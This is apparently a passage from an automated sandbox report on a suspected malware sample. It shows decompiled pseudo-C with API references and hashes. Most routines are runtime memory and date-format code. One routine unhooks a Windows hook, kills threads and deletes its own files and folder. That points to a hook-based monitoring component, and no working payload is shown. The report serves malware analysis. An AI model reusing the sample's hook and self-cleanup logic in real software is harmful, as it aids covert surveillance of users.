                                                                                                                                      					_t23 =  *_t21 -  *0x132e7e8; // 0x132e7dc
                                                                                                                                      					if(_t23 != 0) {
                                                                                                                                      						E01314615(_t7);
                                                                                                                                      					}
                                                                                                                                      					_t24 =  *((intOrPtr*)(_t21 + 4)) -  *0x132e7ec; // 0x132f590
                                                                                                                                      					if(_t24 != 0) {
                                                                                                                                      						E01314615(_t8);
                                                                                                                                      					}
                                                                                                                                      					_t25 =  *((intOrPtr*)(_t21 + 8)) -  *0x132e7f0; // 0x132f590
                                                                                                                                      					if(_t25 != 0) {
                                                                                                                                      						E01314615(_t9);
                                                                                                                                      					}
                                                                                                                                      					_t26 =  *((intOrPtr*)(_t21 + 0x30)) -  *0x132e818; // 0x132e7e0
                                                                                                                                      					if(_t26 != 0) {
                                                                                                                                      						E01314615(_t10);
                                                                                                                                      					}
                                                                                                                                      					_t6 =  *((intOrPtr*)(_t21 + 0x34));
                                                                                                                                      					_t27 = _t6 -  *0x132e81c; // 0x132f594
                                                                                                                                      					if(_t27 != 0) {
                                                                                                                                      						return E01314615(_t6);
                                                                                                                                      					}
                                                                                                                                      				}
                                                                                                                                      				return _t6;
                                                                                                                                      			}










                                                                                                                                      0x0131aaff
                                                                                                                                      0x0131ab04
                                                                                                                                      0x0131ab08
                                                                                                                                      0x0131ab0e
                                                                                                                                      0x0131ab11
                                                                                                                                      0x0131ab16
                                                                                                                                      0x0131ab1a
                                                                                                                                      0x0131ab20
                                                                                                                                      0x0131ab23
                                                                                                                                      0x0131ab28
                                                                                                                                      0x0131ab2c
                                                                                                                                      0x0131ab32
                                                                                                                                      0x0131ab35
                                                                                                                                      0x0131ab3a
                                                                                                                                      0x0131ab3e
                                                                                                                                      0x0131ab44
                                                                                                                                      0x0131ab47
                                                                                                                                      0x0131ab4c
                                                                                                                                      0x0131ab4d
                                                                                                                                      0x0131ab50
                                                                                                                                      0x0131ab56
                                                                                                                                      0x00000000
                                                                                                                                      0x0131ab5e
                                                                                                                                      0x0131ab56
                                                                                                                                      0x0131ab61

                                                                                                                                      APIs
                                                                                                                                      • _free.LIBCMT ref: 0131AB11
                                                                                                                                        • Part of subcall function 01314615: HeapFree.KERNEL32(00000000,00000000,?,0131AB90,?,00000000,?,00000000,?,0131ABB7,?,00000007,?,?,0131AFB4,?), ref: 0131462B
                                                                                                                                        • Part of subcall function 01314615: GetLastError.KERNEL32(?,?,0131AB90,?,00000000,?,00000000,?,0131ABB7,?,00000007,?,?,0131AFB4,?,?), ref: 0131463D
                                                                                                                                      • _free.LIBCMT ref: 0131AB23
                                                                                                                                      • _free.LIBCMT ref: 0131AB35
                                                                                                                                      • _free.LIBCMT ref: 0131AB47
                                                                                                                                      • _free.LIBCMT ref: 0131AB59
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.505409012.0000000001301000.00000020.00000001.01000000.00000005.sdmp, Offset: 01300000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.505385438.0000000001300000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.505578317.0000000001324000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.505631265.000000000132E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.505681175.0000000001330000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_1300000_hjrypmyqervekvpteu.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: _free$ErrorFreeHeapLast
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 776569668-0
                                                                                                                                      • Opcode ID: a90d124055a0a19f73b8e4e8388a36347ee6c0771318684c01f114e8e02d2b94
                                                                                                                                      • Instruction ID: 5d15c9c5309e6883ea1604d688400cace141de0674fe25f8ec691026c4ef090b
                                                                                                                                      • Opcode Fuzzy Hash: a90d124055a0a19f73b8e4e8388a36347ee6c0771318684c01f114e8e02d2b94
                                                                                                                                      • Instruction Fuzzy Hash: 86F01232505281ABD638EE6CE482C16B7EEFA94B2DB588C19F189D750CC730F8814BA4
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                      			E0130269F(void* __ebx) {
                                                                                                                                      				intOrPtr _t2;
                                                                                                                                      				void* _t5;
                                                                                                                                      				int _t19;
                                                                                                                                      
                                                                                                                                      				 *0x132f9b0 = 0;
                                                                                                                                      				TerminateThread(E013014BC, 0);
                                                                                                                                      				_t2 =  *0x132f960; // 0x20327
                                                                                                                                      				_t21 = _t2;
                                                                                                                                      				if(_t2 != 0) {
                                                                                                                                      					__eax = UnhookWindowsHookEx(__eax);
                                                                                                                                      					 *0x132f960 = 0;
                                                                                                                                      					__eax = TerminateThread(E013014A6, 0);
                                                                                                                                      				}
                                                                                                                                      				_t19 = DeleteFileW(E01302712(0x132f9c8, _t21));
                                                                                                                                      				_t5 = E01303300();
                                                                                                                                      				_t22 = _t5;
                                                                                                                                      				if(_t5 != 0) {
                                                                                                                                      					RemoveDirectoryW(E01302712(0x132f9e0, _t22));
                                                                                                                                      				}
                                                                                                                                      				return _t19;
                                                                                                                                      			}






                                                                                                                                      0x013026a8
                                                                                                                                      0x013026ae
                                                                                                                                      0x013026b4
                                                                                                                                      0x013026b9
                                                                                                                                      0x013026bb
                                                                                                                                      0x013026be
                                                                                                                                      0x013026ca
                                                                                                                                      0x013026d0
                                                                                                                                      0x013026d0
                                                                                                                                      0x0130267f
                                                                                                                                      0x01302683
                                                                                                                                      0x01302688
                                                                                                                                      0x0130268a
                                                                                                                                      0x01302694
                                                                                                                                      0x01302694
                                                                                                                                      0x0130269e

                                                                                                                                      APIs
                                                                                                                                      • DeleteFileW.KERNEL32(00000000,?,0132F948,0132F948,00000001), ref: 01302674
                                                                                                                                      • RemoveDirectoryW.KERNEL32(00000000,?,0132F948,0132F948,00000001), ref: 01302694
                                                                                                                                      • TerminateThread.KERNEL32(Function_000014BC,00000000,00000001,01305436,?,0132F948,00000001), ref: 013026AE
                                                                                                                                      • UnhookWindowsHookEx.USER32(00020327), ref: 013026BE
                                                                                                                                      • TerminateThread.KERNEL32(Function_000014A6,00000000,?,0132F948,00000001), ref: 013026D0
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.505409012.0000000001301000.00000020.00000001.01000000.00000005.sdmp, Offset: 01300000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.505385438.0000000001300000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.505578317.0000000001324000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.505631265.000000000132E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.505681175.0000000001330000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_1300000_hjrypmyqervekvpteu.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: TerminateThread$DeleteDirectoryFileHookRemoveUnhookWindows
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 1060769190-0
                                                                                                                                      • Opcode ID: fad6143b3b7639cebe504e067d024bbc2c7a3bda78a7c864296516d9782b726a
                                                                                                                                      • Instruction ID: ff4139f87db477e916518305584d9c28f12e20b249335b4f84ef3ad56f3da50e
                                                                                                                                      • Opcode Fuzzy Hash: fad6143b3b7639cebe504e067d024bbc2c7a3bda78a7c864296516d9782b726a
                                                                                                                                      • Instruction Fuzzy Hash: FCF054717002146BC6327F7D6CEC96BBBEDEA65B6D705401DF541D3296DB748C018750
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      C-Code - Quality: 91%
                                                                                                                                      			E01313545(signed int __ecx) {
                                                                                                                                      				intOrPtr _t7;
                                                                                                                                      
                                                                                                                                      				asm("lock xadd [eax], ecx");
                                                                                                                                      				if((__ecx | 0xffffffff) == 0) {
                                                                                                                                      					_t7 =  *0x132e7d8; // 0x14d9f98
                                                                                                                                      					if(_t7 != 0x132e5b8) {
                                                                                                                                      						E01314615(_t7);
                                                                                                                                      						 *0x132e7d8 = 0x132e5b8;
                                                                                                                                      					}
                                                                                                                                      				}
                                                                                                                                      				E01314615( *0x132f330);
                                                                                                                                      				 *0x132f330 = 0;
                                                                                                                                      				E01314615( *0x132f334);
                                                                                                                                      				 *0x132f334 = 0;
                                                                                                                                      				E01314615( *0x132f564);
                                                                                                                                      				 *0x132f564 = 0;
                                                                                                                                      				E01314615( *0x132f568);
                                                                                                                                      				 *0x132f568 = 0;
                                                                                                                                      				return 1;
                                                                                                                                      			}




                                                                                                                                      0x0131354e
                                                                                                                                      0x01313552
                                                                                                                                      0x01313554
                                                                                                                                      0x01313560
                                                                                                                                      0x01313563
                                                                                                                                      0x01313569
                                                                                                                                      0x01313569
                                                                                                                                      0x01313560
                                                                                                                                      0x01313575
                                                                                                                                      0x01313582
                                                                                                                                      0x01313588
                                                                                                                                      0x01313593
                                                                                                                                      0x01313599
                                                                                                                                      0x013135a4
                                                                                                                                      0x013135aa
                                                                                                                                      0x013135b2
                                                                                                                                      0x013135bb

                                                                                                                                      APIs
                                                                                                                                      • _free.LIBCMT ref: 01313563
                                                                                                                                        • Part of subcall function 01314615: HeapFree.KERNEL32(00000000,00000000,?,0131AB90,?,00000000,?,00000000,?,0131ABB7,?,00000007,?,?,0131AFB4,?), ref: 0131462B
                                                                                                                                        • Part of subcall function 01314615: GetLastError.KERNEL32(?,?,0131AB90,?,00000000,?,00000000,?,0131ABB7,?,00000007,?,?,0131AFB4,?,?), ref: 0131463D
                                                                                                                                      • _free.LIBCMT ref: 01313575
                                                                                                                                      • _free.LIBCMT ref: 01313588
                                                                                                                                      • _free.LIBCMT ref: 01313599
                                                                                                                                      • _free.LIBCMT ref: 013135AA
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.505409012.0000000001301000.00000020.00000001.01000000.00000005.sdmp, Offset: 01300000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.505385438.0000000001300000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.505578317.0000000001324000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.505631265.000000000132E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.505681175.0000000001330000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_1300000_hjrypmyqervekvpteu.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: _free$ErrorFreeHeapLast
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 776569668-0
                                                                                                                                      • Opcode ID: 93b23ec770b61470757594b6a83d27d494c8d96193afa9b73cddf12365674393
                                                                                                                                      • Instruction ID: 5637a2b50701cf33e3bfdf10cf595b352de76ed6d17b7e88083800dba0fa5e18
                                                                                                                                      • Opcode Fuzzy Hash: 93b23ec770b61470757594b6a83d27d494c8d96193afa9b73cddf12365674393
                                                                                                                                      • Instruction Fuzzy Hash: 7EF034B0811221CBEA3AFF1CA9418087BBCEB54F3CB68152EF4209225CD7340542CBC4
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      C-Code - Quality: 89%
                                                                                                                                      			E01317AE5(void* __ebx, signed int __ecx, void* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12, signed int** _a16, signed int* _a20, intOrPtr _a24) {
                                                                                                                                      				signed int _v8;
                                                                                                                                      				short _v10;
                                                                                                                                      				short _v12;
                                                                                                                                      				short _v14;
                                                                                                                                      				short _v16;
                                                                                                                                      				short _v18;
                                                                                                                                      				short _v22;
                                                                                                                                      				char _v24;
                                                                                                                                      				signed int _v28;
                                                                                                                                      				signed int* _v32;
                                                                                                                                      				signed int _v33;
                                                                                                                                      				signed int** _v40;
                                                                                                                                      				intOrPtr _v44;
                                                                                                                                      				intOrPtr* _v48;
                                                                                                                                      				intOrPtr _v52;
                                                                                                                                      				void* _v64;
                                                                                                                                      				signed int _t86;
                                                                                                                                      				intOrPtr _t91;
                                                                                                                                      				signed int _t94;
                                                                                                                                      				signed int _t95;
                                                                                                                                      				signed int _t96;
                                                                                                                                      				void* _t97;
                                                                                                                                      				signed int _t98;
                                                                                                                                      				signed int _t102;
                                                                                                                                      				signed int _t103;
                                                                                                                                      				signed int _t104;
                                                                                                                                      				intOrPtr _t105;
                                                                                                                                      				signed int _t110;
                                                                                                                                      				void* _t111;
                                                                                                                                      				signed int _t116;
                                                                                                                                      				signed int _t117;
                                                                                                                                      				signed int _t129;
                                                                                                                                      				void* _t133;
                                                                                                                                      				signed int _t135;
                                                                                                                                      				intOrPtr _t143;
                                                                                                                                      				signed short* _t144;
                                                                                                                                      				intOrPtr _t145;
                                                                                                                                      				signed int** _t146;
                                                                                                                                      				signed int _t147;
                                                                                                                                      				signed int* _t148;
                                                                                                                                      				signed int _t149;
                                                                                                                                      				signed int _t152;
                                                                                                                                      				signed short** _t154;
                                                                                                                                      				signed int _t155;
                                                                                                                                      				signed int _t159;
                                                                                                                                      				signed int _t163;
                                                                                                                                      				intOrPtr* _t171;
                                                                                                                                      				signed short _t172;
                                                                                                                                      				signed short* _t173;
                                                                                                                                      				signed int** _t174;
                                                                                                                                      				void* _t175;
                                                                                                                                      				void* _t177;
                                                                                                                                      				signed short* _t179;
                                                                                                                                      				intOrPtr* _t180;
                                                                                                                                      				intOrPtr* _t181;
                                                                                                                                      				signed int* _t183;
                                                                                                                                      				signed int _t184;
                                                                                                                                      				signed int** _t185;
                                                                                                                                      				signed int _t186;
                                                                                                                                      				signed int _t187;
                                                                                                                                      				signed int _t188;
                                                                                                                                      
                                                                                                                                      				_t149 = __ecx;
                                                                                                                                      				_t86 =  *0x132e00c; // 0x17120af4
                                                                                                                                      				_v8 = _t86 ^ _t187;
                                                                                                                                      				_t171 = _a12;
                                                                                                                                      				_v52 = _a4;
                                                                                                                                      				_t143 = _a24;
                                                                                                                                      				_v40 = _a16;
                                                                                                                                      				_v48 = _t171;
                                                                                                                                      				_v44 = _t143;
                                                                                                                                      				_t183 = _a20;
                                                                                                                                      				_v32 = _t183;
                                                                                                                                      				_t91 = _a8;
                                                                                                                                      				if(_t91 == 0) {
                                                                                                                                      					_t15 = _t143 + 0x154; // 0x57c03310
                                                                                                                                      					_t179 =  *_t15;
                                                                                                                                      				} else {
                                                                                                                                      					if(_t91 == 1) {
                                                                                                                                      						_t14 = _t143 + 0x158; // 0xabf07d8d
                                                                                                                                      						_t179 =  *_t14;
                                                                                                                                      					} else {
                                                                                                                                      						_t13 = _t143 + 0x15c; // 0xabab016a
                                                                                                                                      						_t179 =  *_t13;
                                                                                                                                      					}
                                                                                                                                      				}
                                                                                                                                      				if( *((intOrPtr*)(_t143 + 0xac)) == 1) {
                                                                                                                                      					goto L113;
                                                                                                                                      				} else {
                                                                                                                                      					_t163 = _t149 & 0xffffff00 | _a8 == 0x00000002;
                                                                                                                                      					_v24 = 0x76c +  *((intOrPtr*)(_t171 + 0x14));
                                                                                                                                      					_v33 = _t163;
                                                                                                                                      					_v22 =  *((intOrPtr*)(_t171 + 0x10)) + 1;
                                                                                                                                      					_v18 =  *((intOrPtr*)(_t171 + 0xc));
                                                                                                                                      					_v16 =  *((intOrPtr*)(_t171 + 8));
                                                                                                                                      					_v14 =  *((intOrPtr*)(_t171 + 4));
                                                                                                                                      					_v12 =  *_t171;
                                                                                                                                      					_v10 = 0;
                                                                                                                                      					_t194 = _t163;
                                                                                                                                      					if(_t163 == 0) {
                                                                                                                                      						__eflags = 0;
                                                                                                                                      						_t35 = _t143 + 0x160; // 0xf0458dab
                                                                                                                                      						_t129 = E0131499D(0, _t183, 0,  *_t35, 0,  &_v24, _t179, 0, 0, 0);
                                                                                                                                      					} else {
                                                                                                                                      						_t34 = _t143 + 0x160; // 0xf0458dab
                                                                                                                                      						_t129 = E01314A75(0, _t183, _t194,  *_t34, 0,  &_v24, _t179, 0, 0);
                                                                                                                                      					}
                                                                                                                                      					_t147 = _t129;
                                                                                                                                      					if(_t147 == 0) {
                                                                                                                                      						goto L113;
                                                                                                                                      					} else {
                                                                                                                                      						_t175 = _t147 + _t147;
                                                                                                                                      						_t165 = _t175 + 8;
                                                                                                                                      						asm("sbb eax, eax");
                                                                                                                                      						if((_t175 + 0x00000008 & _t129) == 0) {
                                                                                                                                      							_t184 = 0;
                                                                                                                                      							__eflags = 0;
                                                                                                                                      							L18:
                                                                                                                                      							_v28 = _t184;
                                                                                                                                      							if(_t184 == 0) {
                                                                                                                                      								L30:
                                                                                                                                      								E0131407D(0);
                                                                                                                                      								_t183 = _v32;
                                                                                                                                      								while(1) {
                                                                                                                                      									L113:
                                                                                                                                      									_t172 =  *_t179 & 0x0000ffff;
                                                                                                                                      									__eflags = _t172;
                                                                                                                                      									if(_t172 == 0) {
                                                                                                                                      										break;
                                                                                                                                      									}
                                                                                                                                      									__eflags =  *_t183;
                                                                                                                                      									if( *_t183 == 0) {
                                                                                                                                      										L28:
                                                                                                                                      										L29:
                                                                                                                                      										return E0130A07B(_v8 ^ _t187);
                                                                                                                                      									}
                                                                                                                                      									_v32 = 0;
                                                                                                                                      									_t152 = 0;
                                                                                                                                      									__eflags = 0;
                                                                                                                                      									_v28 = _t179;
                                                                                                                                      									_t144 = _t179;
                                                                                                                                      									_t94 = _t172 & 0x0000ffff;
                                                                                                                                      									do {
                                                                                                                                      										_t144 =  &(_t144[1]);
                                                                                                                                      										_t152 = _t152 + 1;
                                                                                                                                      										__eflags =  *_t144 - _t94;
                                                                                                                                      									} while ( *_t144 == _t94);
                                                                                                                                      									_t95 = _t172 & 0x0000ffff;
                                                                                                                                      									_v28 = _t144;
                                                                                                                                      									_t145 = _v44;
                                                                                                                                      									__eflags = _t95 - 0x64;
                                                                                                                                      									if(__eflags > 0) {
                                                                                                                                      										_t96 = _t95 - 0x68;
                                                                                                                                      										__eflags = _t96;
                                                                                                                                      										if(_t96 == 0) {
                                                                                                                                      											_t153 = _t152 - 1;
                                                                                                                                      											__eflags = _t153;
                                                                                                                                      											if(_t153 == 0) {
                                                                                                                                      												_v32 = 1;
                                                                                                                                      												L110:
                                                                                                                                      												_push(0x49);
                                                                                                                                      												L111:
                                                                                                                                      												_pop(_t97);
                                                                                                                                      												_t98 = E01316EAF(_t145, _t153, _t179, _v52, _t97, _v48, _v40, _t183, _t145, _v32);
                                                                                                                                      												_t188 = _t188 + 0x1c;
                                                                                                                                      												__eflags = _t98;
                                                                                                                                      												if(_t98 == 0) {
                                                                                                                                      													 *((intOrPtr*)(E01313CD1())) = 0x16;
                                                                                                                                      													goto L29;
                                                                                                                                      												}
                                                                                                                                      												L112:
                                                                                                                                      												_t179 = _v28;
                                                                                                                                      												continue;
                                                                                                                                      											}
                                                                                                                                      											_t153 = _t153 - 1;
                                                                                                                                      											__eflags = _t153;
                                                                                                                                      											if(_t153 == 0) {
                                                                                                                                      												goto L110;
                                                                                                                                      											}
                                                                                                                                      											L108:
                                                                                                                                      											_t154 = _v40;
                                                                                                                                      											_t179 =  &(_t179[1]);
                                                                                                                                      											 *( *_t154) = _t172;
                                                                                                                                      											 *_t154 =  &(( *_t154)[1]);
                                                                                                                                      											 *_t183 =  *_t183 - 1;
                                                                                                                                      											continue;
                                                                                                                                      										}
                                                                                                                                      										_t102 = _t96 - 5;
                                                                                                                                      										__eflags = _t102;
                                                                                                                                      										if(_t102 == 0) {
                                                                                                                                      											_t153 = _t152 - 1;
                                                                                                                                      											__eflags = _t153;
                                                                                                                                      											if(_t153 == 0) {
                                                                                                                                      												_v32 = 1;
                                                                                                                                      												L105:
                                                                                                                                      												_push(0x4d);
                                                                                                                                      												goto L111;
                                                                                                                                      											}
                                                                                                                                      											_t153 = _t153 - 1;
                                                                                                                                      											__eflags = _t153;
                                                                                                                                      											if(_t153 == 0) {
                                                                                                                                      												goto L105;
                                                                                                                                      											}
                                                                                                                                      											goto L108;
                                                                                                                                      										}
                                                                                                                                      										_t103 = _t102 - 6;
                                                                                                                                      										__eflags = _t103;
                                                                                                                                      										if(_t103 == 0) {
                                                                                                                                      											_t153 = _t152 - 1;
                                                                                                                                      											__eflags = _t153;
                                                                                                                                      											if(_t153 == 0) {
                                                                                                                                      												_v32 = 1;
                                                                                                                                      												L100:
                                                                                                                                      												_push(0x53);
                                                                                                                                      												goto L111;
                                                                                                                                      											}
                                                                                                                                      											_t153 = _t153 - 1;
                                                                                                                                      											__eflags = _t153;
                                                                                                                                      											if(_t153 == 0) {
                                                                                                                                      												goto L100;
                                                                                                                                      											}
                                                                                                                                      											goto L108;
                                                                                                                                      										}
                                                                                                                                      										_t104 = _t103 - 1;
                                                                                                                                      										__eflags = _t104;
                                                                                                                                      										if(_t104 == 0) {
                                                                                                                                      											_t105 = _v48;
                                                                                                                                      											__eflags =  *((intOrPtr*)(_t105 + 8)) - 0xb;
                                                                                                                                      											if( *((intOrPtr*)(_t105 + 8)) > 0xb) {
                                                                                                                                      												_t173 =  *(_t145 + 0x150);
                                                                                                                                      											} else {
                                                                                                                                      												_t173 =  *(_t145 + 0x14c);
                                                                                                                                      											}
                                                                                                                                      											__eflags = _t152 - 1;
                                                                                                                                      											if(_t152 != 1) {
                                                                                                                                      												L91:
                                                                                                                                      												_t155 =  *_t173 & 0x0000ffff;
                                                                                                                                      												__eflags = _t155;
                                                                                                                                      												if(_t155 == 0) {
                                                                                                                                      													goto L112;
                                                                                                                                      												}
                                                                                                                                      												_t146 = _v40;
                                                                                                                                      												while(1) {
                                                                                                                                      													__eflags =  *_t183;
                                                                                                                                      													if( *_t183 <= 0) {
                                                                                                                                      														goto L112;
                                                                                                                                      													}
                                                                                                                                      													_t173 =  &(_t173[1]);
                                                                                                                                      													 *( *_t146) = _t155;
                                                                                                                                      													 *_t146 =  &(( *_t146)[0]);
                                                                                                                                      													 *_t183 =  *_t183 - 1;
                                                                                                                                      													_t155 =  *_t173 & 0x0000ffff;
                                                                                                                                      													__eflags = _t155;
                                                                                                                                      													if(_t155 != 0) {
                                                                                                                                      														continue;
                                                                                                                                      													}
                                                                                                                                      													goto L112;
                                                                                                                                      												}
                                                                                                                                      											} else {
                                                                                                                                      												__eflags =  *_t183;
                                                                                                                                      												if( *_t183 <= 0) {
                                                                                                                                      													goto L91;
                                                                                                                                      												}
                                                                                                                                      												_t180 = _v40;
                                                                                                                                      												 *((short*)( *_t180)) =  *_t173;
                                                                                                                                      												 *_t180 =  *_t180 + 2;
                                                                                                                                      												 *_t183 =  *_t183 - 1;
                                                                                                                                      											}
                                                                                                                                      											goto L112;
                                                                                                                                      										}
                                                                                                                                      										__eflags = _t104 != 5;
                                                                                                                                      										if(_t104 != 5) {
                                                                                                                                      											goto L108;
                                                                                                                                      										}
                                                                                                                                      										_t153 = _t152;
                                                                                                                                      										__eflags = _t153;
                                                                                                                                      										if(_t153 == 0) {
                                                                                                                                      											_push(0x79);
                                                                                                                                      											goto L111;
                                                                                                                                      										}
                                                                                                                                      										_t153 = _t153;
                                                                                                                                      										__eflags = _t153;
                                                                                                                                      										if(_t153 != 0) {
                                                                                                                                      											goto L108;
                                                                                                                                      										}
                                                                                                                                      										_push(0x59);
                                                                                                                                      										goto L111;
                                                                                                                                      									}
                                                                                                                                      									if(__eflags == 0) {
                                                                                                                                      										_t153 = _t152 - 1;
                                                                                                                                      										__eflags = _t153;
                                                                                                                                      										if(_t153 == 0) {
                                                                                                                                      											_v32 = 1;
                                                                                                                                      											L75:
                                                                                                                                      											_push(0x64);
                                                                                                                                      											goto L111;
                                                                                                                                      										}
                                                                                                                                      										_t153 = _t153 - 1;
                                                                                                                                      										__eflags = _t153;
                                                                                                                                      										if(_t153 == 0) {
                                                                                                                                      											goto L75;
                                                                                                                                      										}
                                                                                                                                      										_t153 = _t153 - 1;
                                                                                                                                      										__eflags = _t153;
                                                                                                                                      										if(_t153 == 0) {
                                                                                                                                      											_push(0x61);
                                                                                                                                      											goto L111;
                                                                                                                                      										}
                                                                                                                                      										_t153 = _t153 - 1;
                                                                                                                                      										__eflags = _t153;
                                                                                                                                      										if(_t153 != 0) {
                                                                                                                                      											goto L108;
                                                                                                                                      										}
                                                                                                                                      										_push(0x41);
                                                                                                                                      										goto L111;
                                                                                                                                      									}
                                                                                                                                      									__eflags = _t95 - 0x27;
                                                                                                                                      									if(_t95 == 0x27) {
                                                                                                                                      										_t110 = _t152 & 0x80000001;
                                                                                                                                      										__eflags = _t110;
                                                                                                                                      										if(__eflags < 0) {
                                                                                                                                      											__eflags = (_t110 - 0x00000001 | 0xfffffffe) + 1;
                                                                                                                                      										}
                                                                                                                                      										_t179 =  &(_t179[_t152]);
                                                                                                                                      										if(__eflags == 0) {
                                                                                                                                      											_t159 =  *_t179 & 0x0000ffff;
                                                                                                                                      											__eflags = _t159;
                                                                                                                                      											if(_t159 == 0) {
                                                                                                                                      												goto L28;
                                                                                                                                      											}
                                                                                                                                      											_t174 = _v40;
                                                                                                                                      											while(1) {
                                                                                                                                      												__eflags =  *_t183;
                                                                                                                                      												if( *_t183 == 0) {
                                                                                                                                      													goto L113;
                                                                                                                                      												}
                                                                                                                                      												_t111 = 0x27;
                                                                                                                                      												_t179 =  &(_t179[1]);
                                                                                                                                      												__eflags = _t159 - _t111;
                                                                                                                                      												if(_t159 == _t111) {
                                                                                                                                      													goto L113;
                                                                                                                                      												}
                                                                                                                                      												 *( *_t174) = _t159;
                                                                                                                                      												 *_t174 =  &(( *_t174)[0]);
                                                                                                                                      												 *_t183 =  *_t183 - 1;
                                                                                                                                      												_t159 =  *_t179 & 0x0000ffff;
                                                                                                                                      												__eflags = _t159;
                                                                                                                                      												if(_t159 != 0) {
                                                                                                                                      													continue;
                                                                                                                                      												}
                                                                                                                                      												goto L113;
                                                                                                                                      											}
                                                                                                                                      										}
                                                                                                                                      										continue;
                                                                                                                                      									}
                                                                                                                                      									__eflags = _t95 - 0x41;
                                                                                                                                      									if(_t95 == 0x41) {
                                                                                                                                      										L41:
                                                                                                                                      										_t116 = E0131F0C7(_t145, _t179, _t183, _t179, L"am/pm");
                                                                                                                                      										__eflags = _t116;
                                                                                                                                      										if(_t116 != 0) {
                                                                                                                                      											_t117 = E0131F0C7(_t145, _t179, _t183, _t179, L"a/p");
                                                                                                                                      											_pop(_t153);
                                                                                                                                      											__eflags = _t117;
                                                                                                                                      											if(_t117 == 0) {
                                                                                                                                      												_t65 =  &(_t179[3]); // 0x57c03316
                                                                                                                                      												_v28 = _t65;
                                                                                                                                      											}
                                                                                                                                      										} else {
                                                                                                                                      											_t61 =  &(_t179[5]); // 0x57c0331a
                                                                                                                                      											_t153 = _t61;
                                                                                                                                      											_v28 = _t61;
                                                                                                                                      										}
                                                                                                                                      										_push(0x70);
                                                                                                                                      										goto L111;
                                                                                                                                      									}
                                                                                                                                      									__eflags = _t95 - 0x48;
                                                                                                                                      									if(_t95 == 0x48) {
                                                                                                                                      										_t153 = _t152 - 1;
                                                                                                                                      										__eflags = _t153;
                                                                                                                                      										if(_t153 == 0) {
                                                                                                                                      											_v32 = 1;
                                                                                                                                      											L55:
                                                                                                                                      											_push(0x48);
                                                                                                                                      											goto L111;
                                                                                                                                      										}
                                                                                                                                      										_t153 = _t153 - 1;
                                                                                                                                      										__eflags = _t153;
                                                                                                                                      										if(_t153 == 0) {
                                                                                                                                      											goto L55;
                                                                                                                                      										}
                                                                                                                                      										goto L108;
                                                                                                                                      									}
                                                                                                                                      									__eflags = _t95 - 0x4d;
                                                                                                                                      									if(_t95 == 0x4d) {
                                                                                                                                      										_t153 = _t152 - 1;
                                                                                                                                      										__eflags = _t153;
                                                                                                                                      										if(_t153 == 0) {
                                                                                                                                      											_v32 = 1;
                                                                                                                                      											L50:
                                                                                                                                      											_push(0x6d);
                                                                                                                                      											goto L111;
                                                                                                                                      										}
                                                                                                                                      										_t153 = _t153 - 1;
                                                                                                                                      										__eflags = _t153;
                                                                                                                                      										if(_t153 == 0) {
                                                                                                                                      											goto L50;
                                                                                                                                      										}
                                                                                                                                      										_t153 = _t153 - 1;
                                                                                                                                      										__eflags = _t153;
                                                                                                                                      										if(_t153 == 0) {
                                                                                                                                      											_push(0x62);
                                                                                                                                      											goto L111;
                                                                                                                                      										}
                                                                                                                                      										_t153 = _t153 - 1;
                                                                                                                                      										__eflags = _t153;
                                                                                                                                      										if(_t153 != 0) {
                                                                                                                                      											goto L108;
                                                                                                                                      										}
                                                                                                                                      										_push(0x42);
                                                                                                                                      										goto L111;
                                                                                                                                      									}
                                                                                                                                      									__eflags = _t95 - 0x61;
                                                                                                                                      									if(_t95 != 0x61) {
                                                                                                                                      										goto L108;
                                                                                                                                      									}
                                                                                                                                      									goto L41;
                                                                                                                                      								}
                                                                                                                                      								goto L28;
                                                                                                                                      							}
                                                                                                                                      							_t203 = _v33;
                                                                                                                                      							if(_v33 == 0) {
                                                                                                                                      								_t133 = E0131499D(_t165, _t184, __eflags,  *((intOrPtr*)(_v44 + 0x160)), 0,  &_v24, _t179, _t184, _t147, 0);
                                                                                                                                      							} else {
                                                                                                                                      								_t133 = E01314A75(_t165, _t184, _t203,  *((intOrPtr*)(_v44 + 0x160)), 0,  &_v24, _t179, _t184, _t147);
                                                                                                                                      							}
                                                                                                                                      							_t181 = _t184;
                                                                                                                                      							_t177 = _t133 - 1;
